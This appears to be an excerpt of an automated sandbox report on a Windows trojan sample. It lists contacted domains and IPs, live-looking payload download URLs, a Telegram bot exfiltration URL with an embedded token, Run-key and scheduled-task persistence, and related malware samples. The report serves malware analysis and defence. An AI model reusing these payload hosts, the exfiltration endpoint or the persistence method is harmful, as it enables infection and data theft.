                                                                                                                        https://contoso.com/Iconpowershell.exe, 00000046.00000002.2568697905.00000267818D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://dns.google/resolve?name=svchost.exe, 00000031.00000002.3262019634.00007FF8A70CE000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, console_zero.exe, 00000037.00000000.2514449211.00007FF6BC0D3000.00000002.00000001.01000000.00000017.sdmp, console_zero.exe, 00000037.00000002.2585885663.00007FF6BC0D3000.00000002.00000001.01000000.00000017.sdmp, console_zero.exe, 00000047.00000002.2703380660.00007FF6BC0D3000.00000002.00000001.01000000.00000017.sdmp, console_zero.exe, 00000047.00000000.2541271400.00007FF6BC0D3000.00000002.00000001.01000000.00000017.sdmp, SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exefalse
                                                                                                                            		high
                                                                                                                            https://www.gnu.org/licenses/svchost.exe, 00000031.00000002.3260567095.00000000660F4000.00000008.00000001.01000000.00000015.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/ucpusys.datsvchost.exe, 00000031.00000002.3261137440.000001B531C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.3145802717.000001B531CEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3261311476.000001B531CEE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://curl.se/docs/alt-svc.htmlSecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, libcurl.dll.14.drfalse
                                                                                                                                  		high
                                                                                                                                  https://github.com/unvd01/unvmain/raw/main/un2/botprnt.datllcurlapp64.exe, 00000005.00000002.2165249434.000002316268C000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000017.00000002.2359306959.0000018307889000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprWcurlapp64.exe, 00000017.00000003.2358859802.00000183078B2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000017.00000002.2359306959.00000183078B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://unvdwl.com/un2/botprnt.datZcurlapp64.exe, 00000017.00000002.2359306959.0000018307889000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000046.00000002.2568697905.0000026780232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://curl.se/docs/copyright.htmlDSecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, libcurl.dll.14.drfalse
                                                                                                                                          		high
                                                                                                                                          http://www.zlib.net/curlapp64.exe, svchost.exefalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://github.com/unvd01/unvmain/raw/refs/heads/main/un2/uusb.datsvchost.exe, 00000031.00000002.3261463966.000001B531F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://unvdwl.com/un2/botprnt.datcurlapp64.exe, 00000005.00000002.2165249434.000002316268C000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000009.00000002.2276560928.00000260AC2F8000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000017.00000002.2359306959.0000018307889000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://mingw-w64.sourceforge.net/Xsvchost.exe, 00000031.00000002.3260353266.0000000064953000.00000008.00000001.01000000.00000014.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://curl.se/docs/copyright.htmlcurlapp64.exe, svchost.exe, console_zero.exefalse
                                                                                                                                                		high
                                                                                                                                                http://www.zlib.net/DSecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exefalse
                                                                                                                                                  		high
                                                                                                                                                  https://api.telepowershell.exe, 00000046.00000002.2568697905.0000026781635000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000014.00000002.2205494711.0000020C97518000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://github.com/unvd01/unvmain/raw/main/un2/botprnt.datlcurlapp64.exe, 00000017.00000002.2359306959.0000018307889000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.openssl.org/Hsvchost.exe, 00000031.00000002.3262314667.00007FF8B7EF1000.00000002.00000001.01000000.00000011.sdmp, svchost.exe, 00000031.00000002.3261905733.00007FF8A6FCE000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat1curlapp64.exe, 00000005.00000002.2165249434.00000231626B6000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2164909140.00000231626A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://unvdwl.com/un2/urestorehard.datsvchost.exe, 00000031.00000002.3261405626.000001B531F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://aka.ms/pscore68powershell.exe, 00000014.00000002.2205494711.0000020C972F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2568697905.0000026780001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://curl.se/docs/http-cookies.html#curlapp64.exe, svchost.exe, console_zero.exefalse
                                                                                                                                                                		high
                                                                                                                                                                https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessYprintui.exe, 0000000E.00000002.2703991121.000001CC7B6A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://api.telegram.orgpowershell.exe, 00000046.00000002.2568697905.00000267815FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://oneget.orgpowershell.exe, 00000046.00000002.2568697905.0000026781687000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://curl.se/VSecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, libcurl.dll.14.drfalse
                                                                                                                                                                        		high

                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                        Public IPs

                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        8.8.8.8
                                                                                                                                                                        		dns.googleUnited States
                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                        149.154.167.220
                                                                                                                                                                        		api.telegram.orgUnited Kingdom
                                                                                                                                                                        		62041TELEGRAMRUfalse
                                                                                                                                                                        194.26.192.52
                                                                                                                                                                        		unvdwl.comNetherlands
                                                                                                                                                                        		1213HEANETIEfalse
                                                                                                                                                                        34.117.59.81
                                                                                                                                                                        		ipinfo.ioUnited States
                                                                                                                                                                        		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                        140.82.121.3
                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                        		36459GITHUBUSfalse
                                                                                                                                                                        140.82.121.4
                                                                                                                                                                        		github.comUnited States
                                                                                                                                                                        		36459GITHUBUSfalse
                                                                                                                                                                        185.199.110.133
                                                                                                                                                                        		raw.githubusercontent.comNetherlands
                                                                                                                                                                        		54113FASTLYUSfalse
                                                                                                                                                                        188.116.21.204
                                                                                                                                                                        		rootunvbot.comPoland
                                                                                                                                                                        		43333NEPHAX-ASPLfalse

                                                                                                                                                                        Private

                                                                                                                                                                        IP
                                                                                                                                                                        127.0.0.1

                                                                                                                                                                        General Information

                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                        Analysis ID:1549107
                                                                                                                                                                        Start date and time:2024-11-05 10:45:10 +01:00
                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 12m 15s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                        Number of analysed new started processes analysed:138
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Sample name:SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.troj.evad.winEXE@209/117@10/9
                                                                                                                                                                        EGA Information:
                                                                                                                                                                        • Successful, ratio: 83.3%
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 72%
                                                                                                                                                                        • Number of executed functions: 111
                                                                                                                                                                        • Number of non-executed functions: 203
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                                                        Warnings

                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 6184 because it is empty
                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                        • VT rate limit hit for: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe

                                                                                                                                                                        Simulations

                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                        04:46:14API Interceptor1x Sleep call for process: printui.exe modified
                                                                                                                                                                        04:46:15API Interceptor397x Sleep call for process: powershell.exe modified
                                                                                                                                                                        04:46:48API Interceptor1x Sleep call for process: svchost.exe modified
                                                                                                                                                                        04:46:49API Interceptor2x Sleep call for process: console_zero.exe modified
                                                                                                                                                                        10:46:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run curlapp64 C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                        10:46:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run curlapp64 C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                        10:46:51Task SchedulerRun new task: console_zero path: C:\Windows\System32\console_zero.exe

                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                        IPs

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        149.154.167.220F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                          SecuriteInfo.com.Win32.RATX-gen.5672.16639.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                            rSolicituddecotizaci__n.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              0oyt0YS20b.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                att1-241104022450_PDF.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  Pedido de Cota#U00e7#U00e3o-24110004.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                    Pedido de Cota#U00e7#U00e3o-24110004_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                      ORDEN DE COMPRA ALUMINIOS MANDIA SL 664780.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                        Pedido de Cota#U00e7#U00e3o-24110004.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                          20241104095027_PDF.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            194.26.192.52app64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 194.26.192.52/un2/urestorehard.dat
                                                                                                                                                                                            34.117.59.81FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • ipinfo.io/json
                                                                                                                                                                                            172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • ipinfo.io/json
                                                                                                                                                                                            VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • ipinfo.io/json
                                                                                                                                                                                            UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • ipinfo.io/json
                                                                                                                                                                                            I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • ipinfo.io/json
                                                                                                                                                                                            licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                                                                                                            • ipinfo.io/ip
                                                                                                                                                                                            build.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • ipinfo.io/ip
                                                                                                                                                                                            YjcgpfVBcm.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • ipinfo.io/json
                                                                                                                                                                                            lePDF.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • ipinfo.io/json
                                                                                                                                                                                            6Mpsoq1.php.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • ipinfo.io/json

                                                                                                                                                                                            Domains

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            ipinfo.iok1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            app64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            https://load.aberegg-immobilien.ch/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            sgc0e7HpH5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            raw.githubusercontent.com5% discount products.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                            • 185.199.109.133
                                                                                                                                                                                            CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                                                                            • 185.199.108.133
                                                                                                                                                                                            Purchase order.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 185.199.109.133
                                                                                                                                                                                            SecuriteInfo.com.Win64.Malware-gen.19901.26035.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                            • 185.199.109.133
                                                                                                                                                                                            bcb.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                            cac.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 185.199.109.133
                                                                                                                                                                                            SecuriteInfo.com.Trojan.DownLoad4.16905.7671.26379.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                            • 185.199.109.133
                                                                                                                                                                                            SecuriteInfo.com.Trojan.DownLoad4.16905.7671.26379.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            Payment slip.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                            github.commalware-DONT-RUN.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            VjVu82WknO.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            R5h25B8i22.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            SecuriteInfo.com.Win64.Riskware.ExplorerPatcher.B.21185.8531.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            SecuriteInfo.com.Win64.Riskware.ExplorerPatcher.B.21185.8531.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            SecuriteInfo.com.Trojan.GenericKD.74442994.24259.8937.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            SecuriteInfo.com.Trojan.DownLoad4.16905.7671.26379.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                            • 140.82.114.4
                                                                                                                                                                                            SecuriteInfo.com.Trojan.DownLoad4.16907.22610.407.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            SecuriteInfo.com.Trojan.DownLoad4.16905.7671.26379.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            SecuriteInfo.com.Trojan.DownLoad4.16907.22610.407.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.4

                                                                                                                                                                                            ASNs

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            TELEGRAMRUF#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            SecuriteInfo.com.Win32.RATX-gen.5672.16639.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            rSolicituddecotizaci__n.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            build.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                            0oyt0YS20b.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            att1-241104022450_PDF.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Pedido de Cota#U00e7#U00e3o-24110004.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Pedido de Cota#U00e7#U00e3o-24110004_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            ORDEN DE COMPRA ALUMINIOS MANDIA SL 664780.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Pedido de Cota#U00e7#U00e3o-24110004.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                            • 34.117.188.166
                                                                                                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                            • 34.117.188.166
                                                                                                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                            • 34.117.188.166
                                                                                                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                            • 34.117.188.166
                                                                                                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                            • 34.117.188.166
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                            • 34.117.188.166
                                                                                                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                            • 34.117.188.166
                                                                                                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                            • 34.117.188.166
                                                                                                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                            • 34.117.188.166
                                                                                                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                            • 34.117.188.166
                                                                                                                                                                                            GITHUBUSmalware-DONT-RUN.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            VjVu82WknO.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            R5h25B8i22.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            SecuriteInfo.com.Win64.Riskware.ExplorerPatcher.B.21185.8531.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            SecuriteInfo.com.Win64.Riskware.ExplorerPatcher.B.21185.8531.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            SecuriteInfo.com.Trojan.GenericKD.74442994.24259.8937.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            SecuriteInfo.com.Trojan.DownLoad4.16905.7671.26379.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                            • 140.82.114.4
                                                                                                                                                                                            SecuriteInfo.com.Trojan.DownLoad4.16907.22610.407.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            SecuriteInfo.com.Trojan.DownLoad4.16905.7671.26379.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            SecuriteInfo.com.Trojan.DownLoad4.16907.22610.407.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            HEANETIEapp64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 194.26.192.52
                                                                                                                                                                                            wZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 136.206.92.56
                                                                                                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 87.46.74.15
                                                                                                                                                                                            la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 87.35.64.4
                                                                                                                                                                                            la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 136.206.146.44
                                                                                                                                                                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 87.39.1.0
                                                                                                                                                                                            nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 134.226.206.179
                                                                                                                                                                                            arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.157.218.178
                                                                                                                                                                                            la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 157.190.203.83
                                                                                                                                                                                            bin.sh.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 87.41.163.240

                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            bd0bf25947d4a37404f0424edf4db9adapp64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            SecuriteInfo.com.FileRepMalware.12585.5759.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            sadfwqefrqw3f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            SecuriteInfo.com.Win64.Evo-gen.20107.17462.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            SecuriteInfo.com.FileRepMalware.12025.7543.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            SecuriteInfo.com.Heuristic.HEUR.AGEN.1319832.32667.20795.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            ActSet.ps1Get hashmaliciousFredy StealerBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            ActSet.ps1Get hashmaliciousFredy StealerBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            74954a0c86284d0d6e1c4efefe92b521#U2749VER CUENTA#U2749_#U2464#U2466#U2460#U2462#U2463#U2460#U2466#U2462.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            6725c86d7fc7b.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
